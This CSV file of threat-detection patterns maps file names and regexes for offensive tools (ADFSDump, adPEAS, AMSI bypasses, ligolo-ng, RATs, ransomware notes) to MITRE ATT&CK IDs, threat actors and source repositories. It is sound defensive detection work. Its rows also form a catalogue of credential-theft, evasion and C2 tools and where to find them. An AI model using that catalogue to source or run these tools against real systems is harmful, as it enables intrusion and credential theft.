"*\ADFSDump.exe*",".{0,1000}\\ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","13838"
"*\ADFSDump\*",".{0,1000}\\ADFSDump\\.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","13839"
"*\ADFSDump\*",".{0,1000}\\ADFSDump\\.{0,1000}","offensive_tool_keyword","ADFSDump","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13840"
"*\ADFSDump\*",".{0,1000}\\ADFSDump\\.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13841"
"*\ADFSDump-master*",".{0,1000}\\ADFSDump\-master.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","13842"
"*\ADFSDump-PS-main*",".{0,1000}\\ADFSDump\-PS\-main.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 ","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","0","N/A","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","13843"
"*\ADFSpoof.py*",".{0,1000}\\ADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","13844"
"*\ADFSpray*",".{0,1000}\\ADFSpray.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","13845"
"*\ADFSRelay\*",".{0,1000}\\ADFSRelay\\.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","13846"
"*\adfs-spray.py*",".{0,1000}\\adfs\-spray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","13847"
"*\adhunt.py*","\\adhunt\.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","13849"
"*\adlogin.ps1*",".{0,1000}\\adlogin\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","13851"
"*\adm2sys.py*",".{0,1000}\\adm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","13853"
"*\admin_persistence_winlogon*",".{0,1000}\\admin_persistence_winlogon.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","13854"
"*\admin-panels.txt*",".{0,1000}\\admin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","13855"
"*\ADPassHunt.pdb*",".{0,1000}\\ADPassHunt\.pdb.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13856"
"*\ADPassHunt\*",".{0,1000}\\ADPassHunt\\.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13857"
"*\adPEAS.ps1*",".{0,1000}\\adPEAS\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13858"
"*\adPEAS_DomainPolicy.Sys*",".{0,1000}\\adPEAS_DomainPolicy\.Sys.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13859"
"*\adPEAS_outputfile*",".{0,1000}\\adPEAS_outputfile.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13860"
"*\adPEAS-Light.ps1*",".{0,1000}\\adPEAS\-Light\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13861"
"*\adPEAS-main*",".{0,1000}\\adPEAS\-main.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13862"
"*\adPEAS-master*",".{0,1000}\\adPEAS\-master.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13863"
"*\ADSearch.exe*",".{0,1000}\\ADSearch\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","13868"
"*\ADSearch.exe*",".{0,1000}\\ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","13869"
"*\AdsMasquerade.ps1*",".{0,1000}\\AdsMasquerade\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","13870"
"*\ADSyncDecrypt\*",".{0,1000}\\ADSyncDecrypt\\.{0,1000}","offensive_tool_keyword","ADSyncDecrypt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13871"
"*\ADSyncDecrypt\*",".{0,1000}\\ADSyncDecrypt\\.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13872"
"*\Adzok_Open_v*.jar*",".{0,1000}\\Adzok_Open_v.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","Adzok","RAT tool - a variant of Adwind abused by TA","T1219 - T1105 - T1027 - T1059 - T1204","TA0011 - TA0005 - TA0002 - TA0008","N/A","Packrat","Malware","https://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A","13882"
"*\AES_cryptor.py *",".{0,1000}\\AES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","13887"
"*\agent.exe --connect *",".{0,1000}\\agent\.exe\s\-\-connect\s.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","13888"
"*\agent.exe"" --connect *",".{0,1000}\\agent\.exe\""\s\-\-connect\s.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","13889"
"*\agent_exe.exe*",".{0,1000}\\agent_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","13890"
"*\aggressor/spoolsystem.cna*",".{0,1000}\\aggressor\/spoolsystem\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","13891"
"*\AKID-RATV04.exe*",".{0,1000}\\AKID\-RATV04\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13895"
"*\akira_readme.txt*",".{0,1000}\\akira_readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13896"
"*\alan.log*",".{0,1000}\\alan\.log.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","13897"
"*\Alan.v*.zip*",".{0,1000}\\Alan\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","13898"
"*\Alcatraz.exe*",".{0,1000}\\Alcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","13899"
"*\All_attack.txt*",".{0,1000}\\All_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","13900"
"*\all_in_one_enum.ps1*",".{0,1000}\\all_in_one_enum\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","13901"
"*\alphv1.txt*",".{0,1000}\\alphv1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13905"
"*\alphv2.txt*",".{0,1000}\\alphv2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13906"
"*\alphv3.txt*",".{0,1000}\\alphv3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13907"
"*\AlwaysInstallElevated.cs*",".{0,1000}\\AlwaysInstallElevated\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","13908"
"*\Amnesiac.ps1*",".{0,1000}\\Amnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13910"
"*\Amnesiac-main\*",".{0,1000}\\Amnesiac\-main\\.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13911"
"*\amsi\dll.zip*",".{0,1000}\\amsi\\dll\.zip.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","13919"
"*\amsi\hook-win32.dll*",".{0,1000}\\amsi\\hook\-win32\.dll.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","13920"
"*\amsi\hook-win64.dll*",".{0,1000}\\amsi\\hook\-win64\.dll.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","13921"
"*\amsi_bypass.rs*",".{0,1000}\\amsi_bypass\.rs.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","13922"
"*\AmsiBypass.*",".{0,1000}\\AmsiBypass\..{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","13923"
"*\amsikiller.py*",".{0,1000}\\amsikiller\.py.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","13924"
"*\AMSIPatcher.cs*",".{0,1000}\\AMSIPatcher\.cs.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","13925"
"*\AmsiProvider.cpp*",".{0,1000}\\AmsiProvider\.cpp.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","13926"
"*\AmsiProvider.sln*",".{0,1000}\\AmsiProvider\.sln.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","13927"
"*\AMSI-Provider-main*",".{0,1000}\\AMSI\-Provider\-main.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","13928"
"*\AmsiTrigger.csproj*",".{0,1000}\\AmsiTrigger\.csproj.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","13929"
"*\AmsiTrigger.pdb*",".{0,1000}\\AmsiTrigger\.pdb.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13930"
"*\AmsiTrigger.sln*",".{0,1000}\\AmsiTrigger\.sln.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","13931"
"*\AMSITrigger\*",".{0,1000}\\AMSITrigger\\.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","13932"
